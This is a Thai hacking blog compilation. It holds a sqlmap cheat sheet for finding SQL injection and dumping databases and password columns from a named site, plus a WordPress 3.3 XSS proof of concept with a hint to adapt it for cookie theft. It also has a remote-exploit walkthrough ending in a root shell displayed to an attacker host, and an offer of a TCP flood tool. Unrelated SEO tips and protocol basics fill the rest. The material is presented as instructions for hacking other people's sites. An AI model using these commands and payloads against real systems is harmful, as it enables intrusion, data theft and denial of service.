(ถ้าจะเอาขั้นสูงๆ มาอีก ก็ sqlmap.py --h แล้วอ่านอีก 30 นาที ก็จะใช้คู่ tor, proxy ได้แระ)
ซึ่งผมเองก็เพิ่งอ่านเมื่อกี้นี้เอง ..? ก็เลยเอามาเขียนคู่มือสรุปคร่าวๆ ให้ เผื่อใครขี้เกียจอ่าน ^^"

1) แสกนหา ช่องโหว่ SQL injection
# แบบธรรมดาๆ method GET

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php?bug=31337&test=hack_you"`

# แบบธรรมดาๆ method POST

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php"` `--data="bug=31337&test=hack_you"`

# แบบเจาะจง parameter พิเศษ? (ใช้ marker จุดที่จะ inject ด้วย *)

1	`./sqlmap.py -u` `"http://www.stephack.com/index/bug/31337*/hack_you"`

# แบบเจาะจง parameter พิเศษ? (ใช้ -p)

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php"` `--data="bug=31337&test=hack_you"` `-p` `"bug"`

# แบบที่ต้อง login เข้าไปแฮก (ใช้ cookie)

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php"` `--data="bug=31337&test=hack_you"` `-p` `"bug"` `--cookie="cookie1=blabla1;cookie2=blabla2"`

# แบบต้องทำ bypass filter (ใช้ script ช่วย)

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php"` `--data="bug=31337&test=hack_you"` `-p` `"bug"` `-b --tamper="tamper_script1_name.py,tamper_script2_name.py"`

# แบบปลอม UserAgent

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php"` `--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"`

# แบบใช้คู่ tor

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php"` `--tor`

2) ดู database ที่ user กำลังเชื่อมต่ออยู่ (--current-db)

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php?bug=31337&test=hack_you"` `--current-db`

3) ดู database ทั้งหมด ที่ user นั้นมีสิทธิ์ (--dbs)

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php?bug=31337&test=hack_you"` `--dbs`

4) ดู tables ทั้งหมด ใน <DATABASE> ที่กำหนด

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php?bug=31337&test=hack_you"` `-D DATABASE --tables`

5) ดู columns ทั้งหมด ใน <TABLE> ที่กำหนด

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php?bug=31337&test=hack_you"` `-D DATABASE -T TABLE --columns`

6) dump <DATA> ที่อยู่ใน <COLUMN> จาก <DATABASE>

1	`./sqlmap.py -u` `"http://www.stephack.com/index.php?bug=31337&test=hack_you"` `-D DATABASE -T TABLE -C DATA1,DATA2,DATA3 --dump`

===================
* <DATABASE> เช่น mysql projectX wordpress
** <TABLE> เช่น members topic
*** <COLUMN> เช่น id name password
*** <DATA_N> เช่น "id,name,password"
**** รู้สึก -(- หนึ่งอัน) กับ -- (- สองอัน) จะมองไม่ออกเลยแฮะ _ _''
====================

รูปตัวอย่างการโดน SQL Injection

ขอบคุณภาพ จาก สมาชิกเพจ
====================

ปล. วิธีแฮก ?... เรื่องง่ายๆ ถ้ามีคนสอน

Cr: Windows98se จาก blog.Stephack.com

วิธีหา Exploit คร่าวๆ และ Exploit คืออะไร?

2013-10-21T09:07:00.001+07:00

Exploit คืออะไร ถ้าให้พูดตรงๆความหมาย มันก็คือ ช่องโหว่นั้นเอง

Exploit เป็นคำที่มากจากภาษาฝรั่งเศสเกิดจากการที่เอาคำ 2 คำมาผสมกันมีความหมายว่า “achievement” หรือว่า “accomplishment” เป็นโปรแกรมที่ได้รับการออกแบบมาเพื่อให้ทำการเจาะระบบโดยอาศัย ช่องโหว่ของ software, Hardware หรือช่องโหว่ต่างๆเพื่อที่จะเข้ามาทำการครอบครองหรือควบคุม computer เพื่อที่จะให้กระทำการบางอย่าง เช่น การขโมยข้อมูลหรือใช้ในการ denial of service attack

Exploit นั้นมี 2 ประเภทนะครับ

- remote exploit เป็นการทำงานโดยที่จะทำการเจาะระบบที่ได้รับการป้องกันที่ไม่ดีโดยอาศัยสิทธิที่มี มาก่อน
- local exploit เป็นการโจมตีที่ถ้าเข้ามาในระบบได้แล้วจะทำการเพิ่มสิทธิต่างๆเข้ามาใน User ที่เราได้สร้างเอาไว้โดยอาศัยความช่วยเหลือของ system administrator

โดยปกติพวกเราจะใช้เครื่องมือในการใช้งานเช่น metasploit หรือใช้ armitage หรือ etc ในการใช้งานเพื่อให้ดูง่ายๆ เป็น GUI ส่วนพวก exploit นั้นก็สามารถหาได้อย่างง่ายดายในโลก internet เช่น 1337day,exploit-db,...etc

วันนี้ผมจะมาแนะนำ exploit ของ cms ชื่อดังอย่าง wordpress v3.3 ที่เพิ่งออกมาใหม่แท้ๆ โดนเสียและ

exploit ตัวนี้คือ Zero Day Reflected XSS vulnerability ช่องโหว่นี้อยู่ในส่วน comment ของ WP3.3 ป.ล XSS = cross site script

# Exploit Title: Reflected Cross Site Scripting in wordpress 3.3
# Google Dork: "Proudly powered by WordPress"
# Date: 2.Jan.2012
# Author: Aditya Modha, Samir Shah
# Software Link: WordPress › Download
# Version: 3.3
# Tested on: apache
# CVE : Nope.

Step 1: Post a comment to the target website
>>โพสต์คอมเม้นลงไปในเว็บเป้าหมาย

Step 2: Replace the value of author tag, email tag, comment tag with the exact value of what has been post in the last comment. Change the value of comment_post_ID to the value of post (which can be known by opening that post and checking the value of p parameter in the url). For example the if the url is http://127.0.0.1/wordpress/?p=6 then the value of comment_post_ID is 6.
>> แก้ไขคค่าในส่วนของ value ของ author,email,comment,post id

HTML Code:

<html>
<title>Wordpress 3.3 XSS PoC</title>

<body>

<form name="XSS" id="XSS" action="http://127.0.0.1/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
<input type="hidden" name="author" value="แก้ไข">
<input type="hidden" name="email" value="แก้ไข">
<input type="hidden" name="url" value="">
<input type="hidden" name="comment" value="แก้ไข">
<input type="hidden" name="submit" value="Post Comment">
<input type="hidden" name="comment_post_ID" value="แก้ไข">
<input type="hidden" name="comment_parent" value="0">
<input type="button" value="Click Me" />
</form>

</body>
</html>

Step 3: Publish the above html file on the web server and access it. Click on "Click Me" button. This will try to post the comment to wordpress which will flag this comment as duplicate comment with the 500 Internal server error response. Here our XSS payload will get executed. Check wordpress_3.3_xss.png file.
>> เผยแพร่ไฟล์ HTML ดังกล่าวข้างต้นลงบนเว็บเซิร์ฟเวอร์และเข้าถึงได้ คลิกที่"Click Me" นี้จะพยายามที่จะแสดงความคิดเห็นเพื่อการใช้งานซึ่งจะเห็นธงนี้เป็นความคิดเห็นที่ซ้ำกัน กับการตอบสนองต่อข้อผิดพลาด 500 Internal server error response ที่นี่ payload XSS ของเราจะได้รับการดำเนิน ตรวจสอบแฟ้ม wordpress_3.3_xss.png

Step 4: The response code where XSS payload reflects is given below
>> ลักษณะของการโต้ตอบกลับ เมือ XSS payload ส่งผลดังข้อมูลด้านล่าง

HTML Code:

<!DOCTYPE html>
<!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes, even after gzip compression abcdefghijklmnopqrstuvwxyz1234567890aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz11223344556677889900abacbcbdcdcededfefegfgfhghgihihjijikjkjlklkmlmlnmnmononpopoqpqprqrqsrsrtstsubcbcdcdedefefgfabcadefbghicjkldmnoepqrfstugvwxhyz1i234j567k890laabmbccnddeoeffpgghqhiirjjksklltmmnunoovppqwqrrxsstytuuzvvw0wxx1yyz2z113223434455666777889890091abc2def3ghi4jkl5mno6pqr7stu8vwx9yz11aab2bcc3dd4ee5ff6gg7hh8ii9j0jk1kl2lmm3nnoo4p5pq6qrr7ss8tt9uuvv0wwx1x2yyzz13aba4cbcb5dcdc6dedfef8egf9gfh0ghg1ihi2hji3jik4jkj5lkl6kml7mln8mnm9ono
-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>WordPress &rsaquo; Error</title>
 <style type="text/css">
  html {
   background: #f9f9f9;
  }
  body {
   background: #fff;
   color: #333;
   font-family: sans-serif;
   margin: 2em auto;
   padding: 1em 2em;
   -webkit-border-radius: 3px;
   border-radius: 3px;
   border: 1px solid #dfdfdf;
   max-width: 700px;
  }
  #error-page {
   margin-top: 50px;
  }
  #error-page p {
   font-size: 14px;
   line-height: 1.5;
   margin: 25px 0 20px;
  }
  #error-page code {
   font-family: Consolas, Monaco, monospace;
  }
  ul li {
   margin-bottom: 10px;
   font-size: 14px ;
  }
  a {
   color: #21759B;
   text-decoration: none;
  }
  a:hover {
   color: #D54E21;
  }

  .button {
   font-family: sans-serif;
   text-decoration: none;
   font-size: 14px !important;
   line-height: 16px;
   padding: 6px 12px;
   cursor: pointer;
   border: 1px solid #bbb;
   color: #464646;
   -webkit-border-radius: 15px;
   border-radius: 15px;
   -moz-box-sizing: content-box;
   -webkit-box-sizing: content-box;
   box-sizing: content-box;
  }

  .button:hover {
   color: #000;
   border-color: #666;
  }

  .button {
   background: #f2f2f2 url(http://127.0.0.1/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>/wp-admin/images/white-grad.png) repeat-x scroll left top;
  }

  .button:active {
   background: #eee url(http://127.0.0.1/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>/wp-admin/images/white-grad-active.png) repeat-x scroll left top;
  }
   </style>
</head>
<body id="error-page">
 <p>Duplicate comment detected; it looks as though you’ve already said that!</p></body>
</html>

ผลที่ได้ Attachment 1542

แล้วถ้าการปะยุกต์ ถ้าเกิดปรับเปลี่ยน javascript ให้รับค่า cookies , session id ,etc ล่ะ ผลที่ได้ อาจไม่สวยนัก ถ้าคนที่ตกเป็นเหยื่อ victim คือ เจ้าของเว็บ หรือ ผู้ที่มีสิทธิ เช่น administrator อาจก่อให้เกิดความเสียหายได้

ข้อมูลจาก : http://citecclub.org

การ Hack ด้วย Remote Exploit

2013-10-20T08:16:00.002+07:00

เหมือนผมจะเคยอธิบายเกี่ยวกับการ Hack โดยอาศัย Exploit มาแล้วแต่จำไม่ได้ว่า อธิบายให้ใครฟัง (ก็คงจะเป็นพวกที่เรียนคอร์ด Hack นั้นละ) ในการ hack นั้นเรา ต้องการจะ Hack เว็บใครซักเว็บ อันดับแรกเราต้องรู้ว่า Exploit เว็บนั้นคืออะไร ถ้าเป็น CMS ฟรี สามารถหาโหลดตาม Google มานั่งแกะหา ช่องโหว่ดู ถ้าขี้เกียจหน่อยก็จะค้นเอาใน Google ในบทความนี้ก็จะอธิบาย การเจาะระบบด้วย Remote นั้นเป็นยังไง พวก RCE ( Remote Code Exploit )

อะไรคือการเจาะระบบแบบ remote ?

การเจาะระบบแบบ remote เกิดขึ้นเมื่อคุณโจมตีเซิร์ฟเวอร์ที่คุณไม่ได้ล๊อกอินเข้าไป โดยโจมตีจากเซิร์ฟเวอร์อื่น ถึงแม้ว่าในบางกรณีคุณสามารถโจมตีจากเครื่องพีซีทั่ว ๆ ไป (ขึ้นอยู่กับระบบปฏิบัติการ)
การเดาแอกเคาท์ของยูสเซอร์และรหัสผ่าน (ยกเว้นแต่ว่ามีแอกเคาท์ guest) ในระบบอื่นไม่ถือว่าเป็นการเจาะแบบ remote เราจะสมมุติว่า คุณไม่รู้ชื่อแอกเคาท์และรหัสผ่านในระบบอื่น
การ เจาะระบบแบบ remote แบ่งเป็นสองประเภท โดยมักจะเป็นการเจาะโดยอาศัยช่องโหว่ที่มีในเซอร์วิสที่กำลังรันอยู่ใน เซิร์ฟเวอร์ที่ตกเป็นเหยื่อ (ที่มีการกำหนดค่าระบบไม่ถูกต้องหรือยอมให้มีการเข้าถึงมากเกินไป การ export NFS (network file system) mount แบบ read/write ให้ทุกคนสามารถเข้าถึงได้อาจไม่ใช่สิ่งที่ไม่เลวร้าย แต่ถ้าคุณสามารถ NFS mount ไดเร็กทอรีที่มีไฟล์ .rhosts ได้เป็นสิ่งที่เลวร้ายมาก นอกจากนี้ daemon ที่รันอยู่บางชนิดอาจมีปัญหาที่อาจถูกโจมตีแบบ buffer overflow แบบ remote ได้ ยอมให้ใครบางคนจากเซิร์ฟเวอร์อื่นสามารถใช้คำสั่งในเครื่องที่ตกเป็นเป้า หมายได้ตามต้องการ
ต่อไปนี้เป็นตัวอย่างสองตัวอย่างด้วยกัน
- คุณเป็น root ในเครื่องที่ชื่อว่า badguy
- คุณค้นพบว่าโฮสต์เป้าหมาย export /home2/old เป็นแบบ read/write ให้ทุกคนสามารถเข้าถึงได้
- คุณใช้คำสั่ง finger ไปยังแอกเคาท์ต่าง ๆ แล้วพบว่า home directory ของยูสเซฮร์ fred คือ /home2/old/fred เขาไม่ได้ log in หลายเดือนแล้ว
- คุณสร้างแอกเคาท์ fred ในเครื่อง badguy ทันที
- แล้วคุณจึง mount /home2/old ในเครื่องเป้าหมาย แล้วสร้างไฟล์ .rhosts เพื่อให้เครื่องที่ตกเป็นเหยื่อเชื่อถือเครื่อง badguy
- หลังจากที่คุณเป็นยูสเซอร์ fred ในเครื่อง badguy คุณจึงเชื่อมต่อแบบ rlogin ไปยังเครื่องเป้าหมายโดยเป็นยูสเซอร์ fred
ต่อไปนี้เป็นตัวอย่างการโจมตีโดยอาศัย buffer overflow
- โฮสต์ที่เป็นเป้าหมายกำลังรัน named
- คุณได้เขียน exploit ที่เกี่ยวกับ named ที่ยอมให้คุณสามารถส่งคำสั่งได้ตามต้องการผ่าน named daemon ซึ่งใช้เทคนิค buffer overflow คุณคอมไพล์มันและตั้งชื่อว่า sploit
- คุณพิมพ์ว่า: sploit victim.nmrc.org "/usr/X11R6/bin/xterm -display badguy.whatever:0"
- มีวินโดวส์ปรากฏขึ้นที่จอเทอร์มินัลของคุณที่กำลังรันเป็น root อยู่ที่ victim.nmrc.org

ข้อมูล infosec.sran.org

การทำ SEO ให้เว็บไซต์ติดอันดับ และ เป็นมิตรกับ Google

2013-10-19T22:01:00.002+07:00

การทำ SEO ให้เว็บไซต์ติดอันดับ และ เป็นมิตรกับ Google

คอนเซปต์หรือจุดประสงค์สูงสุดของเราในการจัดทำSEOให้แก่เวปไซต์ของท่านมีอยู 2 ประเด็นคือ
1). เพื่อให้เวปไซต์ของท่านมีความเป็นมิตรกับWeb Crawlerของกูเกิลมากที่สุด
2). เพื่อให้เวปไซต์ของท่านง่ายต่อการใช้(หรือเข้าชม)ของผู้เยี่ยมชมเวปไซต์มากที่สุด

รูป ก. นี้ใช้อธิบายข้อ 1-4

(รูปนี้ใช้อธิบายข้อ 1-4)

จากรูป ก. สรุปได้ว่า

1. เวปไซต์เป็นระเบียบ มีระบบนำทางดี (Navigation)

หุ่นยนต์ที่เรียกว่า web crawler ซึ่งไต่ไปตามเวปต่างๆในโลกอินเตอร์เนทของกูเกิลเพื่อเก็บข้อมูลไปindexหน้า เวปกูเกิลนั้นไม่ชอบเวปไซต์ที่ยุ่งเหยิง ข้อมูลกระจัดกระจาย และรกรุงรัง
จากรูปจะเห็นว่าเวปไซต์มีความเรียบง่าย แต่แน่นด้วยคุณภาพคือมีการแบ่งหมวดหมู่อย่างชัดเจนและง่ายต่อการใช้งานของ ผู้เยี่ยมชมเวปไซต์ ซึ่งลักษณะแบบนี้จะมีความเป็นมิตรต่อweb crawlerของกูเกิลมากตามคอนเซปต์"เรียบง่ายด้วยสาระ"
เวปไซต์เก่าของลูกค้าบางท่านนำเสนอข้อมูลอย่างกระจัดกระจาย ซึ่งทางเราจะช่วยจัดวางระบบข้อมูลใหม่ทั้งหมดเพื่อให้ถูกกับประเภทของ ข้อมูล

2. มีหัวข้อและอยู่ในตำแหน่งที่โดดเด่น (Header)

การนำเสนอข้อมูลใดๆต้องมีหัวข้อนำก่อนทุกครั้ง ไม่ควรนำเสนอข้อมูลใดๆก่อนโดยไม่มีหัวข้อ เพราะกูเกิลจะนำหัวข้อนี้ไปindexในเวปกูเกิล และเมื่อมีใครค้นหาด้วยkeywordsหรือคำค้นที่ใกล้เคียงกับหัวข้อ เวปเราจะปรากฏในลำดับต้นๆของเวปกูเกิล การไม่มีหัวข้อนอกจากกูเกิลไม่ชอบแล้ว คนเยี่ยมชมเวปก็ต้องใช้เวลาอ่านนานกว่าจะเข้าใจว่ากำลังพูดถึงเรื่งออะไร อยู่ การทำSEOจึงต้องมีหัวข้อที่ตรงกับเรื่องที่นำเสนอและอยู่ในตำแหน่งที่โดด เด่น ซึ่งจากรูป ก. จะเห็นว่าหัวข้ออยู่ในตำแหน่งที่โดดเด่นและจัดทำเป็นตัวหนา
เวปไซต์เก่าของลูกค้าบางท่านขาดความเข้าใจจึงนำเสนอข้อมูลโดยไม่มีหัวข้อ กำกับ ซึ่งทางเราจะช่วยวิเคราะห์และจัดทำหัวข้อให้ตรงกับเนื้อหา

3. มีรายละเอียดที่แน่นด้วยสาระ (Content)

รายละเอียดคือหัวใจสำคัญของเวปไซต์ว่าเวปไซต์เรานำเสนอหรือเกี่ยวข้องกับ อะไร รายละเอียดต้องแน่นด้วยสาระแต่ต้องไม่เยิ่นเย้อหรืออรัมภบทมากเกินไป ควรกระชับและได้ใจความ จากรูป ก. จะเห็นว่าข้อความมีการนำเสนออย่างกระชับ ได้ใจความ
เวปไซต์เก่าของลูกค้าบางท่านอรัภบทยาวหรืออธิบายมากเกินความจำเป็น ซึ่งทางเราจะช่วยขัดเกลาให้มีความกระชับและได้ใจความ รวมทั้งช่วยปรับปรุงให้เนื้อหามีความสัมพันธ์กับหัวข้อ เพราะweb crawlerจะให้ความสำคัญกับความเกี่ยวข้องระหว่างหัวข้อกับรายละเอียดด้วย

4. มีการเน้นหัวข้อหรือประโยคที่สำคัญ (Highlight)

ประโยคไหน หรือคำไหนที่เราต้องการเน้นให้ลูกค้าจดจำ เราควรเน้นคำหรือประโยคนั้นๆให้โดดเด่น เช่น ทำให้เป็นตัวใหญ่ ตัวหนา ขีดเส้นใต้ หรือตัวหนังสือสี เพราะจะดึงดูดให้ web crawler เข้ามาเก็บข้อมูลไปindexไว้หน้ากูเกิลมากกว่าตัวหนังสือปกติ
จากรูป ก.จะเห็นว่ามีการทำตัวใหญ่และหนาพวกคำ หัวข้อหรือประโยคที่สำคัญและเราต้องการเน้นเป็นพิเศษ

5. เมาส์ชี้แล้วมีคำอธิบาย (ดูรูปประกอบ)

รูป ข.

โดยปกติweb crawlerรู้จักเวปไซต์หรือรายละเอียดแต่ละหน้าจากข้อความหรือเนื้อหาภายใน เวปไซต์หรือหน้าเวปเพจนั้นๆ แต่เนื่องจากไฟล์รูปภาพไม่ใช่ไฟล์ตัวหนังสือ(font)ถ้าเราไม่บอกว่าเป็นรูป ภาพอะไร web crawlerก็จะไม่รู้จัก ไม่นำรูปเราไปindexในเวปกูเกิล เราจึงต้องบอกใบ้ให้web crawlerรู้ว่ารูปดังกล่าวคือภาพอะไร
จากรูป ข. เมื่อเราเอาเมาส์ไปชี้แช่ไว้ที่รูปภาพสักครู่หนึ่ง จะมีคำอธิบายบอกว่ารูปนี้คือรูปอะไร ซึ่งทำให้รูปดังกล่าวถูกนำไปindexในไฟล์รูปภาพของกูเกิล คนก็จะค้นเจอรูปเราในเวปกูเกิล(นำให้เขาเข้ามาที่เวปเรา เป็นการเพิ่มโอกาสได้ลูกค้าภายในตัว) ลองเปิดเวปท่านแล้วเอาเมาส์ไปชี้แช่ไว้ว่ามีคำอธิบายหรือไม่
เวปเก่าของลูกค้าบางท่านไม่มีเทคนิคนี้ กูเกิลจึงไม่เก็บรูปไปอินเดกซ์ทำให้เสียโอกาสหลายอย่างไป ซึ่งทางเราจะช่วยเพิ่มเทคนิคนี้ให้แก่เวปท่าน เพื่อชี้ให้web crawlerรู้ว่ารูปดังกล่าวคือรูปอะไร ซึ่งจะทำให้เวปไซต์ท่านได้เปรียบกว่าเวปอื่น(หรือเวปคู่แข่ง)ไปก้าวหนึ่ง

6. แอบซ่อน Source Code ไว้หน้าเวปเพจ (ดูรูปประกอบ)

ก่อนอ่านข้อนี้ให้ท่านลองทำตามคำแนะนำต่อไปนี้
- เปิดเวปไซต์ท่านขึ้นมา
- เอาเมาส์ไปคลิกที่ View ของ Browser แล้วคลิกเลือกSource
- จะปรากฏหน้าต่างsource codeออกมาดังรูป ค.
จากนั้นให้สังเกตว่าเวปท่านมีข้อมูลอย่างที่จะอธิบายต่อไปนี้หรือยัง?

รูป ค.

Source Code คือ ชุดรหัสคำสั่งให้เวปไซต์แสดงผลหน้าเวป หน้าเวปเพจเปรียบเหมือนจอทีวีที่หลังทีวีต้องมีหลอดจอภาพและอุปกรณ์ต่างๆที่ ทำงานสัมพันธ์กันเพื่อให้มีภาพปรากฏหน้าจอ ฉะนั้นsource codeก็เปรียบเสมือนจอภาพและสายไฟ อุปกรณ์ที่อยู่เบื้องหลังทีวี
Web Crawlerจะไต่สำรวจข้อมูลเวปไซต์หรือหน้าเวปเพจต่างๆไปตามsource codeที่สลับซับซ้อนเหล่านี้ ซึ่งเราสามารถใช้ข้อดีตรงนี้โดยการแอบแทรก meta keywords ซึ่งเป็นพวกkeywordsที่เกี่ยวข้องกับเวปไซต์เราไปแทรกไว้ใน source code เพื่อให้กูเกิลเก็บข้อมูลไปindexในเวปกูเกิล ส่งผลทำให้เวปเราถูกคนค้นเจอเยอะกว่าเวปคู่แข่งที่ไม่ได้ใช้เทคนิคนี้
จากรูป ค. ซึ่งเป็นเวปไซต์กำจัดปลวก จะเห็นว่ามีการแทรกkeywordsต่างๆที่เกี่ยวข้องกับการกำจัดปลวกไว้ในsource codeซึ่งkeywordsเหล่านี้จะถูกกูเกิลเก็บไปอินเด็กซ์

ข้อมูลจาก : http://www.chiangmaichristianwebsite.com/

การยิง IP ด้วย TCP Flood (รีวิว)

2013-10-19T16:43:00.002+07:00

อันเนื่องมาจากบทความยิง IP ด้วย TCP Flood ว่ามันจริงหรือไม่ เนื่องจากการ Flood หรือที่รู้ๆกันแล้วว่า คือการส่งข้อมูล Pecket ขนาดต่างๆ เข้ามาอย่างรวดเร็วจน เซิฟหรือ คอม ไม่สามารถ ประมวณผลได้ทัน จนทำให้ล่มในที่สุด ผมว่าเข้ามาดูกันดีกว่า ว่ามันยิงได้หรือไม่

ใครที่อยากได้ผมจะแจกละกัน เร็วๆนะครับ เพราะผมจะลบแล้ว ถ้าโดนเตือน โปรแกรมนี้เป็นภาษา Perl ต้องลง โปรแกรมที่สามารถ Run ภาษา Pl ได้

ลิงค์โหลด ActivePerl

ลิงค์โหลด TCP Flood : TCP Flood Download

รีวิวจาก Blog เก่าผม ถ้ายังไม่เข้าใจว่าการยิง IP จริงๆคืออะไรผมแนะนำให้ไปอ่านที่ : http://p.pw/baenrV

ส่วนใครที่ไม่รู้ว่ามันคืออะไร และ เขียน Perl ไม่เป็นกรุณาอย่าโชว์ภูมิความรู้ที่น้อยนิดก็ได้นะครับ เพราะผมอธิบายไปแล้วว่า Flood มันคืออะไร DDos คืออะไร เพราะก่อนหน้านี้มีคนโชว์ภูมิความรู้ว่า เป็นแค่โปรแกรมปิดหน้าต่างนะครับ เห็นแล้วรู้สึกสังเวชใน ความรู้ของคนๆนั้น กรุณากลับไปอ่านพวก Perl ก่อนเถอะครับ

ปล. ผมไม่สอนยิง IP หรือ ยิง IP ให้ใคร เพราะทางเราไม่สนับสนุนให้เป็น"เกรียน"

Protocol คืออะไร?

2013-10-19T15:47:00.001+07:00

Protocol คืออะไร

     โปรโตคอล คือ ข้อกำหนดหรือข้อตกลงในการสื่อสารระหว่างคอมพิวเตอร์ หรือภาษาสื่อสารที่ใช้เป็น ภาษากลางในการสื่อสารระหว่างคอมพิวเตอร์ด้วยกัน การที่เครื่องคอมพิวเตอร์ที่ถูกเชื่อมโยงกันไว้ในระบบจะสามารถติดต่อสื่อสาร กันได้นั้น จำเป็นจะต้องมีการสื่อสารที่เรียกว่า โปรโตคอล (Protocol) เช่นเดียวกับคนเราที่ต้องมีภาษาพูดเพื่อให้สื่อสารเข้าใจกันได้

    โปรโตคอลช่วยให้ระบบคอมพิวเตอร์สองระบบ ที่แตกต่างกันสามารถสื่อสารกันอย่างเข้าใจได้ คือข้อตกลงที่กำหนดเกี่ยว กับการสื่อสารระหว่างเครื่องคอมพิวเตอร์ต่างๆ ทั้งวิธีการส่งและรับข้อมูล วิธีการตรวจสอบข้อผิดพลาดของการส่งและรับข้อมูล การแสดงผลข้อมูลเมื่อส่งและรับกันระหว่างเครื่องสองเครื่อง ดังนั้นจะเห็นได้ว่าโปรโตคอลมีความสำคัญมากในการสื่อสารบนเครือข่าย หากไม่มีโปรโตคอลแล้ว การสื่อสารบนเครือข่ายจะไม่สามารถเกิดขึ้นได้

ตัวอย่างของโปรโตคอล

1. โปรโตคอล HTTP หรือ Hypertext Transfer Protocol จะใช้เมื่อเรียกโปรแกรมบราวเซอร์ (Browser)

2. โปรโตคอล TCP/IP หรือ Transfer Control Protocol/Internet Protocol คือเครือข่ายโปรโตคอลที่สำคัญมากที่สุด เนื่องจากเป็นโปรโตคอลที่ใช้ในระบบเครือข่าย Internet รวมทั้ง Intranet ซึ่งประกอบด้วย 2 โปรโตคอลคือ TCP และ IP

3. โปรโตคอล SMTP หรือ Simple Mail Transfer Protocol คือ โปรโตคอล ที่ใช้ในการรับส่งจดหมายอิเล็กทรอนิกส์บนเครือข่ายอินเทอร์เน็ต

    นอกจากโปรโตคอลที่กล่าวมาข้างต้นแล้ว ยังมีโปรโตคอลต่างๆอีกมากมาย เช่น การโอนย้ายแฟ้มระหว่างกัน ใช้โปรโตคอลชื่อ FTP หรือ File Transfer Protocol การโอนย้ายข่าวสารระหว่างกันก็ใช้โปรโตคอลชื่อ NNP หรือ Network News Transfer Protocol และยังมีโปรโตคอลที่สำคัญสำหรับการสอบถามข้อมูลข่าวสารระหว่างกัน ซึ่งเป็นโปรโตคอลที่มีประโยชน์มาก โปรโตคอลนี้มีชอว่า ICMP หรือ Internet Control Message Protocolเป็นต้น

Protocol HTTP คือ?

   HTTP เป็นกลไกหรือโปรโตคอลหลักที่ใช้แลกเปลี่ยนข้อมูลกันระหว่างเซิร์ฟเวอร์และไคลเอนต์ของเวิลด์ไวด์เว็บ(www.) โดยถูกออกแบบมาให้มีความกระทัดรัด สามารถทำงานได้รวดเร็ว มีกระบวนการทำงานที่ไม่ซับซ้อน และมีคำสั่งที่ใช้งานไม่มากนัก แต่สามารถรองรับข้อมูลได้ทุกแบบ ไม่ว่าเป็นข้อมูลทั่วไปที่เข้ารหัสแบบ MIME หรือข้อมูลที่เป็นกราฟิก

   หลักการทำงานทั่วๆไปของ HTTP คือ จะแบบการทำงานออกเป็น 2 ด้านคือ ด้านเว็บเซิร์ฟเวอร์ และด้านไคลเอนต์ โดยไคลเอนต์จะติดต่อเข้ามายังเซิร์ฟเวอร์โดยใช้โปรแกรมบราวเซอร์ และอ้างถึงแอดเดรสของเซิร์ฟเวอร์โดยใช้รูปแบบของ URL ส่วนด้านเซิร์ฟเวอร์จะส่งข้อมูลกลับมาในรูปแบบที่เป็น HTML โดยที่โปรโตคอล HTTP ใช้วิธีการเข้ารหัสในแบบ MIME เป็นมาตรฐานของการทำงาน

   โครงสร้างข้อมูลของ HTTP จะแบ่งออกเป็น 2 ส่วนใหญ่ๆคือ ส่วนเฮดเดอร์ หรือเรียกว่า metadata จะเป็นส่วนเก็บข้อมูลที่จำเป็นต้องใช้ภายในโปรโตคอล ส่วนที่สองเป็นส่วนข้อมูลจริงที่ต้องการรับส่ง ทั้งนี้ HTTP ถูกออกแบบมาให้สามารรับส่งข้อมูลผ่าน Proxy หรือ Firewall ต่างๆได้ โดยการทำงาน HTTP จะอาศัยโปรโตคอลพื้นฐาน TCP/IP ซึ่งทั่วไปจะใช้หมายเลขพอร์ตที่ 80

   โปรโตคอล HTTP ในปัจจุบันได้พัฒนาขึ้นมาเป็นเวอร์ชั่น 1.1 (จากเดิมคือ เวอร์ชั่น 1.0) ซึ่งโปรแกรมบราวเซอร์ที่แพร่หลายทั่วไปนั้นจะสามารถรองรับโปรโตคอลในเวอร์ชั่นใหม่นี้ได้ และได้กำหนดไว้เป็นมาตรฐานใน RFC2068 แล้ว โดยในHTTP เวอร์ชั่น1.1 นี้ได้เพิ่มประสิทธิภาพทำงานให้สูงขึ้น และปรับปรุงในด้านต่างๆที่ทำให้ความสามารถมากขึ้น

TCP/IP คืออะไร

          TCP/IP (Transmission Control Protocol/Internet Protocol) เป็นระบบโปรโตคอล การสื่อสารพื้นฐานของระบบอินเตอร์เน็ต มันสามารถใช้เป็น โปรโตคอลในการสื่อสารภายใน เครือข่ายส่วนบุคคล เรียกว่า intranet และ extranet เมื่อมีการติดต่อโดยตรงกับ internet เครื่องคอมพิวเตอร์จะได้รับการคัดลอกโปรแกรม TCP/IP เช่นเดียวกับคอมพิวเตอร์อื่น ๆ เพื่อทำให้ส่งข้อความขอรับสารสนเทศ
TCP/IP เป็นโปรแกรม 2 เลเยอร์ TCP (Transmission Control Protocol) เป็นเลเยอร์ที่สูงกว่า ทำหน้าที่จัดการแยกข้อความหรือไฟล์แลปรกอบให้เหมือนเดิม IP (Internet Protocol) เป็นเลเยอร์ที่ต่ำกว่า ทำหน้าที่จัดการส่วนของที่อยู่ของแต่ละชุดข้อมูล เพื่อทำให้มีปลายทางที่ถูกต้อง เครื่องคอมพิวเตอร์ที่ทำหน้าที่เป็น Gateway บนเครือข่ายจะตรวจที่อยู่นี้เพื่อหาจุดหมายในการส่งข้อความ ชุดข้อมูลอาจจะใช้เส้นทางไปยังปลายทางต่างกัน แต่ทั้งหมดจะได้รับการประกอบใหม่ที่ปลายทาง
